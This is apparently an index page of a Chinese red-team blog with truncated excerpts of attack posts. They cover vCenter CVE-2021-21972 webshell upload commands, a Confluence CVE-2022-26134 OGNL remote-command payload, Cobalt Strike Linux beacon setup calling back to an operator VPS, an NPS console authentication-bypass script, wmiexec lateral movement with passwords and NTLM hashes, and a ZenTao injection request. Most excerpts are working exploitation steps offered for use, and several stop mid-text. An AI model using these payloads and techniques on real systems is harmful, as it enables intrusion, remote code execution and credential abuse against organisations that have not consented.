日常技巧-BCELCODE加解密
今天值守的过程中碰到这么一个数据包,出现这么一串东西,之前没特别关注过,百度一波发现是BCEL加密
https://github.com/Xd-tl/BCELCode
1java -jar BCELCode.jar -d 333.txt
红队技术-Vcenter实战利用方式总结
Vcenter利用方式总结指纹特征1title="+ ID_VC_Welcome +"
查看Vcenter版本1/sdk/vimServiceVersions.xml
CVE-2021-219721/ui/vropspluginui/rest/services/uploadova
访问上面的路径,如果404,则代表不存在漏洞,如果405 则代表存在漏洞
windows机器:
漏洞利用: https://github.com/horizon3ai/CVE-2021-21972
12345python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp-t (目标地址)-f (上传的文件)-p (上传后的webshell路径,默认不用改)
上传后的路径为
1https://x.x.x.x/statsreport/gsl.jsp
完整 ...
漏洞复现-禅道前台注入
漏洞编号CNVD-2022-42853
影响产品1234禅道企业版 6.5 禅道旗舰版 3.0 禅道开源版 16.5 禅道开源版 16.5.beta1
复现过程搭建禅道环境,点击start运行
访问地址,登录进行抓包
1234567891011121314151617POST /zentao/user-login.html HTTP/1.1Host: 192.168.121.133:82User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://192.168.121.133:82/zentao/user- ...
红队技术-Cobaltstrike之Linux上线
edit-gencon学习一下 TryGOTry 师傅,项目基本都配置好只需要改动相关参数即可,个人推荐这种方式,CrossC2 坑比较多
https://github.com/TryGOTry/edit-gencon
使用项目中的 gmail.profile 作为 profile 配置启动 teamserver,或修改自己常用 profile 的相关参数
新建一个监听器,看自己喜好设置HTTP或HTTPS,这里生成https的监听器
拷贝 cs 服务端的cobaltstrike.beacon_keys到本地
1sz .cobaltstrike.beacon_keys
接着解密获取到加密的key,下载工具编译即可
https://github.com/darkr4y/geacon/tree/master/tools/BeaconTool
1java -jar BeaconTool.jar -i .cobaltstrike.beacon_keys -rsa
生成后的内容填入到项目的 config.go 里面去,并把 C2 内容替换为 VPS:端口
基本上就配置完成,其他参数如 ...
红队技术-接管NPS控制台
红队反制-接管NPS控制台最近看到有意思的东西,参考千寻瀑的文章复现了一下
https://github.com/ehang-io/nps/releases/tag/v0.26.10
到github上下载相应的版本,我这里用的win就下载win相关的客户端和服务端
下载完成后,输入以下命令,接着访问8080端口进入web页面,默认账号密码为 admin/123
12nps.exe installnps.exe start
客户端连接
web控制台正常是需要密码才能登录的,但是由于默认配置导致可以伪造认证进行访问,就是时间有点短只有20s
漏洞位置位于web\controllers\base.go
而在nps.conf配置文件里,auth_key默认是被注释掉的
因此只需要添加auth_key和timestamp两个参数即可登入后台和使用相关功能点
使用脚本:
12345678import timeimport hashlibnow = time.time()m = hashlib.md5()m.update(str(int(now)).encode("utf8 ...
渗透测试-登陆口js前端加密绕过
登陆口js前端加密绕过环境搭建1、首先得安装maven,具体方法百度
2、下载 https://github.com/c0ny1/jsEncrypter c0ny1师傅写好的burp插件
运行mvn package进行编译,编译好后会多出一个target文件夹
test文件夹是本地测试demo跟常见加密算法的js脚本
script脚本为自带的phantomjs服务端模板文件
3、把target文件夹里面的jar插件添加到burp里面
4、安装phomtomjs,并把phantomjs-2.1.1-windows\bin添加到环境变量,测试出现下图为成功
https://phantomjs.org/download.html
本地实践1、安装phpstudy,然后把jsencrypter/test/webapp整个文件夹复制到phpstudy
2、运行phpstudy,访问 /webapp 出现下图为成功
3、登录抓取数据包,发现进行了加密
4、f12打开控制台进行调试,首先查看 index,可以看到调用了 JSEncrypt.js 文 ...
云安全-常见漏洞学习笔记
面向对象的存储,也被称为云存储,云存储主要分为三部分,分别是 key、data 和 Metadata
假设一个地址为 http//aaa.s3.ap-northeast-2.amazonaws.c/bbb
123这里aaa为存储桶的名称,bbb为keyData 就是存储的数据本体Metadata 就是元数据,是数据的标签、描述之类的信息
环境搭建12345安装dockeryum install docker启动dockerservice docker startchkconfig docker on
腾讯云拉取
123docker pull registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4docker run -itd --name terraformgoat_tencentcloud_0.0.4 registry.cn-beijing.aliyuncs.c/huoxian_p/terraformgoat_tencentcloud:0.0.4docker ...
漏洞复现-confluence远程代码执行
1/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
使用此工具直接写入内存马
红队技术-各端口横向移动方法
135端口执行命令
12python wmiexec-pro.py administrator:Admin12345@192.168.186.136 exec-command -command "whoami" -with-outputpython wmiexec-pro.py -hashes :5571e12eef026de606df1ff9d4dab6f8 administrator@192.168.204.72 exec-command -command "whoami" -with-output
上传文件
1python wmiexec-pro.py administrator:Admin12345@192.168.186.136 filetransfer -upload -src-file "/root/Desktop/decode.exe" -dest-file "C:\users\public\test.exe"
wmiexec12python wmiexec.py -hashes : ...
渗透测试-soapUI调试webservice
渗透测试过程中,可能会碰到以wsdl结尾的站点
这时候可以通过soapUI进行测试会比较方便
https://github.com/SmartBear/soapui
下载完成后,点击soapui.bat运行程序,直接点击jar包运行会报错
1、新建一个project
2、add wsdl
3、填入地址
4、发送payload进行测试










